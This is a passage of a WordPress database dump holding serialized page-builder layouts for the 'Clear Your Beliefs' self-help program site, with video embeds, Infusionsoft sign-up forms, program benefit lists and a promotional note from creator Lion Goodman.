Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1356, 1803, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1207:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:3:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:5:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}}}'),
(1354, 1801, 'panels_data', 'a:3:{s:7:"widgets";a:4:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1228:"<p>[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]</p><div style="height: auto; width: 100%;"><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><p><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}}s:10:"grid_cells";a:4:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}}}'),
(1287, 1747, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1286, 1746, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1401:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> 